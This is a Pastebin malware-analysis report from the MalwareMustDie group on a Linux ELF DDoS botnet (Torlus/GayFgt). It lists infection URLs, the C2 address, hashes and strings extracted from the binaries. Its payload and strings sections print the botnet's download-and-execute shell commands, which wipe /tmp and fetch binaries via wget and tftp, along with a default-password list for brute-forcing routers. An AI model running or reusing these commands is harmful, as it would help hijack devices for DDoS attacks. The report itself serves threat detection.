MalwareMustDie

Malware ELF DDOS Botnet Torlus/GayFgt Infection Report

Feb 27th, 2016
4,320
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.    _____         .__                                  _____                  __ _______  .__        
  2.   /     \ _____  |  |__  _  _______ _______   ____   /     \  __ __  _______/  |\____ \ |__| ____  
  3.  /  \ /  \\__  \ |  |\ \/ \/ /\__  \\_  __ \_/ __ \ /  \ /  \|  |  \/  ___/\   __\  |  \|  |/ __ \
  4. /    Y    \/ __ \|  |_\     /  / __ \|  | \/\  ___//    Y    \  |  /\___ \  |  | |  `   \  \  ___/
  5. \____|__  (____  /____/\/\_/  (____  /__|    \___  >____|__  /____//____  > |__|/__ __  /__|\___  >
  6.         \/     \/                  \/            \/        \/           \/             \/        \/
  7. #MalwareMustDie :: malwaremustdie.org
  8.  
  9. ###############################
  10. # 0x01. Cyber crime Suspect
  11. ###############################
  12.  
  13.   Handle: AntiChrist/Reverse/NoHacker/etc.. | Origin: Noord Netherlands
  14.   Verdict: Hack routers for ELF malware backddor for DDOS attack & etc malicious purpose
  15.            a Lizard Squad loonies, and administrator of lizard stresser service.
  16.            PoC: https://pastebin.com/raw/nweQVfN6
  17.   Profile:
  18.   http://malwaremustdie.org/stat/antichrist.html
  19.  
  20. ###############################
  21. # 0x02. Report details
  22. ###############################
  23.  
  24.    New malware infrastructure in Moldova & Lithuania
  25.    Malware variant: ELF Botnet Torlus/GayFgt/Lizard Kebab multi architecture.
  26.    Malware / incident reference: MMD-0052-2016 - SkidDDOS ELF infection
  27.    http://blog.malwaremustdie.org/2016/02/mmd-0052-2016-skidddos-elf-distribution.html
  28.  
  29. #### ELF INFECTION #######
  30.  
  31. // infection:
  32. http://new.updatebits.su/get.sh (185.130.5.179)
  33. // updates1:
  34. http://new.updatebits.su/cfw.sh (185.130.5.179)
  35. // updates2
  36. cf.updatebits.su (208.67.1.66)
  37.  
  38. //CNC:
  39. 176.123.7.70:168
  40. hostname: 176-123-7-70.alexhost.md (176.123.7.70)
  41. Connection to 176.123.7.70 168 port [tcp/] succeeded!
  42.  
  43. // domain:
  44. domain:        UPDATEBITS.SU
  45. nserver:       amy.ns.cloudflare.com.
  46. nserver:       art.ns.cloudflare.com.
  47. state:         REGISTERED, DELEGATED
  48. person:        Private Person
  49. e-mail:        zefknot@gmx.com
  50. registrar:     R01-REG-FID
  51. created:       2015.11.28
  52. paid-till:     2016.11.28
  53. free-date:     2016.12.31
  54. source:        TCI
  55.  
  56. #### PAYLOAD SERVER #######
  57.  
  58. HTTP/1.1 200 OK
  59. Date: Sat, 27 Feb 2016 13:28:25 GMT
  60. Server: Apache/2.2.15 (CentOS)
  61. Last-Modified: Fri, 26 Feb 2016 22:13:32 GMT
  62. ETag: "14202b6-703-52cb39c0a08f2"
  63. 200 OK
  64.  
  65. #### LOCATION ######
  66.  
  67. {
  68.   "ip": "185.130.5.179",
  69.   "hostname": "new.updatebits.su",
  70.   "city": "",
  71.   "region": "",
  72.   "country": "LT",
  73.   "loc": "56.0000,24.0000",
  74.   "org": "AS60117 Host Sailor Ltd."
  75.  
  76.   "ip": "176.123.7.70",
  77.   "hostname": "176-123-7-70.alexhost.md",
  78.   "city": "Chisinau",
  79.   "region": "Municipiul Chisinau",
  80.   "country": "MD",
  81.   "loc": "47.0056,28.8575",
  82.   "org": "AS200019 ALEXHOST SRL"
  83.  
  84.   "ip": "208.67.1.66",
  85.   "hostname": "cf.updatebits.su",
  86.   "city": "Kansas City",
  87.   "region": "Missouri",
  88.   "country": "US",
  89.   "loc": "39.1472,-94.5735",
  90.   "org": "AS33387 DataShack, LC",
  91.   "postal": "64116"
  92. }
  93.  
  94. #### PAYLOADS #######
  95.  
  96. -------------------
  97. ulimit -n 712
  98. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d11 || wget http://185.130.5.179/d11;cat d11 >busybox;chmod 777 busybox;./busybox
  99. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d8 || wget http://185.130.5.179/d8;cat d8 >busybox;chmod 777 busybox;./busybox
  100. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d7 || wget http://185.130.5.179/d7;cat d7 >busybox;chmod 777 busybox;./busybox
  101. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d1 || wget http://185.130.5.179/d1;cat d1 >busybox;chmod 777 busybox;./busybox
  102. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d2 || wget http://185.130.5.179/d2;cat d2 >busybox;chmod 777 busybox;./busybox
  103. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d3 || wget http://185.130.5.179/d3;cat d3 >busybox;chmod 777 busybox;./busybox
  104. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d4 || wget http://185.130.5.179/d4;cat d4 >busybox;chmod 777 busybox;./busybox
  105. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d5 || wget http://185.130.5.179/d5;cat d5 >busybox;chmod 777 busybox;./busybox
  106. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d6 || wget http://185.130.5.179/d6;cat d6 >busybox;chmod 777 busybox;./busybox
  107. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d9 || wget http://185.130.5.179/d9;cat d9 >busybox;chmod 777 busybox;./busybox
  108. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d10 || wget http://185.130.5.179/d10;cat d10 >busybox;chmod 777 busybox;./busybox
  109. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d12 || wget http://185.130.5.179/d12;cat d12 >busybox;chmod 777 busybox;./busybox
  110. rm -rf /tmp/1
  111. rm -rf /var/run/
  112.  
  113. #### BINS #######
  114.  
  115. --------------------
  116. d1: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
  117. d10:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
  118. d11:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
  119. d12:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, not stripped
  120. d2: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
  121. d3: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, not stripped
  122. d4: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
  123. d5: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
  124. d6: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, not stripped
  125. d7: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
  126. d8: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
  127. d9: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
  128.  
  129. #### HASHES #######
  130.  
  131. --------------------
  132. SHA1 (d1) = 7d23b5292db6f928da4e357194d83466ef177a31
  133. SHA1 (d10) = 09e1fecc42b9d95a5b72209b8c44656aac15133e
  134. SHA1 (d11) = 691f1848297cf2b79d8e7936fb57915243ff30a5
  135. SHA1 (d12) = b09c71710132975ebc3d5ece042664f99f270238
  136. SHA1 (d2) = 26eedb2f6d7a0794b4ed264f8185439421892c0a
  137. SHA1 (d3) = 2b1511cd39a5f5540608713a617fe0496e8cbc18
  138. SHA1 (d4) = 577ac74c5e28d73ab5738b1d039d2be6d9fab649
  139. SHA1 (d5) = e6cbd349bed899005824f63e7232b70111c73b63
  140. SHA1 (d6) = 047db9b9ea6e69511f7353e263518ed8c18a6168
  141. SHA1 (d7) = 506b499efcd2436e7863de7ce6e6aa1f62537a71
  142. SHA1 (d8) = 2c6863d79808801623bfd3bcce216c023004397d
  143. SHA1 (d9) = 4249e6fd28ee2838759f1621f4c1bd79a4b1dec2
  144.  
  145. #### SNIPS #######
  146.  
  147. --------------------
  148. .rodata:0x0805CD40  176.123.7.70:168
  149. .rodata:0x0805CD51  root
  150. .rodata:0x0805CD57  admin
  151. .rodata:0x0805CD5E  user
  152. .rodata:0x0805CD64  login
  153. .rodata:0x0805CD6B  guest
  154. .rodata:0x0805CD72  support
  155. .rodata:0x0805CD7B  cisco
  156. .rodata:0x0805CD82  toor
  157. .rodata:0x0805CD88  changeme
  158. .rodata:0x0805CD92  1234
  159. .rodata:0x0805CD98  12345
  160. .rodata:0x0805CD9F  123456
  161. .rodata:0x0805CDA7  default
  162. .rodata:0x0805CDB0  pass
  163. .rodata:0x0805CDB6  password
  164. .rodata:0x0805CDC0  vizxv
  165. .rodata:0x0805CDC7  (null)
  166. .rodata:0x0805CDCE  buf: %s\n
  167. .rodata:0x0805CDD7  -c
  168. .rodata:0x0805CDDA  sh
  169. .rodata:0x0805CDDD  /bin/sh
  170. .rodata:0x0805D200  /proc/cpuinfo
  171. .rodata:0x0805D20E  BOGOMIPS
  172. .rodata:0x0805D217  PING
  173. .rodata:0x0805D21C  :>%$#
  174. .rodata:0x0805D223  %d.%d.%d.%d
  175. .rodata:0x0805D22F  %d.%d.%d.0
  176. .rodata:0x0805D23A  ogin:
  177. .rodata:0x0805D240  \r\n
  178. .rodata:0x0805D243  assword:
  179. .rodata:0x0805D24C  ncorrect
  180. .rodata:0x0805D255  sh\r\n
  181. .rodata:0x0805D25A  shell\r\n
  182. .rodata:0x0805D264  cd /tmp || cd /var/run; rm -rf *; busybox wget http://new.updatebits.su/cfw.sh || wget http://new.updatebits.su/cfw.sh; sh cfw.sh; rm -rf cfw.sh; busybox tftp -r tft.sh -g cf.updatebits.su || tftp -r tft.sh -g cf.updatebits.su; sh tft.sh; rm -rf tft.sh\r\n
  183. .rodata:0x0805D364  /bin/busybox;echo -e 'gayfgt'\r\n
  184. .rodata:0x0805D384  ulti-call
  185. .rodata:0x0805D38E  REPORT %s:%s:%s
  186. .rodata:0x0805D39E  gayfgt
  187. .rodata:0x0805D3D8  Failed opening raw socket.
  188. .rodata:0x0805D3F4  Failed setting raw headers mode.
  189. .rodata:0x0805D415  all
  190. .rodata:0x0805D41B  syn
  191. .rodata:0x0805D41F  rst
  192. .rodata:0x0805D423  fin
  193. .rodata:0x0805D427  ack
  194. .rodata:0x0805D42B  psh
  195. .rodata:0x0805D42F  Invalid flag \”%s\”
  196. .rodata:0x0805D441  PONG!
  197. .rodata:0x0805D447  GETLOCALIP
  198. .rodata:0x0805D452  My IP: %s
  199. .rodata:0x0805D45C  SCANNER
  200. .rodata:0x0805D464  SCANNER ON | OFF
  201. .rodata:0x0805D475  OFF
  202. .rodata:0x0805D479  ON
  203. .rodata:0x0805D47C  FORK
  204. .rodata:0x0805D481  HOLD
  205. .rodata:0x0805D486  JUNK
  206. .rodata:0x0805D48B  UDP
  207. .rodata:0x0805D48F  TCP
  208. .rodata:0x0805D493  KILLATTK
  209. .rodata:0x0805D49C  Killed %d.
  210. .rodata:0x0805D4A7  None Killed.
  211. .rodata:0x0805D4B4  LOLNOGTFO
  212. .rodata:0x0805D4BE  8.8.8.8
  213. .rodata:0x0805D4C6  /proc/net/route
  214. .rodata:0x0805D4D6  \t00000000\t
  215. .rodata:0x0805D4E1  [cpuset]
  216. .rodata:0x0805D4EA  fork failed\n
  217. .rodata:0x0805D4F9  FAILED TO CONNECT
  218. .rodata:0x0805D50B  PONG
  219. .rodata:0x0805D510  DUP
  220. .rodata:0x0805D514  SH
  221. .rodata:0x0805D517  %s 2>&1
  222. .rodata:0x0805D523  LINK CLOSED
  223. .rodata:0x0805D564  0.9.30
  224. .rodata:0x0805DBC8  -c
  225. .rodata:0x0805DBCB  /bin/sh
  226. .rodata:0x0805DE2C  /dev/null
  227. .rodata:0x0805DE74  clntudp_create: out of memory\n
  228. .rodata:0x0805DEE0  bad auth_len gid %d str %d auth %d\n
  229. .rodata:0x0805DF04  xdr_string: out of memory\n
  230. .rodata:0x0805DF1F  xdr_bytes: out of memory\n
  231. .rodata:0x0805DF68  (nil)
  232. .rodata:0x0805DF6E  (null)
  233. .rodata:0x0805DFC5  npxXoudifFeEgGaACScs
  234. .rodata:0x0805EB90  __get_myaddress: socket
  235. .rodata:0x0805EBA8  __get_myaddress: ioctl (get interface configuration)
  236. .rodata:0x0805EBDD  __get_myaddress: ioctl
  237. .rodata:0x0805EBF4  Cannot register service
  238. .rodata:0x0805EC1C  xdr_array: out of memory\n
  239. .rodata:0x0805EC38  /etc/resolv.conf
  240. .rodata:0x0805EC49  /etc/config/resolv.conf
  241. .rodata:0x0805EC61  nameserver
  242. .rodata:0x0805EC6C  domain
  243. .rodata:0x0805EC73  search
  244. .rodata:0x0805EC7A  %s%s%m\n
  245. .rodata:0x0805ED5C  RPC: (unknown error code)
  246. .rodata:0x0805ED76  %s:
  247. .rodata:0x0805ED7F  ; errno = %s
  248. .rodata:0x0805ED8C  ; low version = %lu, high version = %lu
  249. .rodata:0x0805EDB4  ; why =
  250. .rodata:0x0805EDBD  (unknown authentication error - %d)
  251. .rodata:0x0805EDE1  ; s1 = %lu, s2 = %lu
  252. .rodata:0x0805F1D4  %x
  253. .rodata:0x0805F1D7  0123456789abcdef
  254. .rodata:0x0805F1E8  /etc/hosts
  255. .rodata:0x0805F1F3  /etc/config/hosts
  256.  
  257. ###############################
  258. # 0x03. Contact us for more information
  259. ###############################
  260.  
  261. Twitter: @malwaremustdie (Direct Message)
  262.          warning: your IP/location will be scanned & conversation is recorded
  263.          Come clean & stay safe!
  264.  
  265. #MalwareMustDie!
  266. [EOF]
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×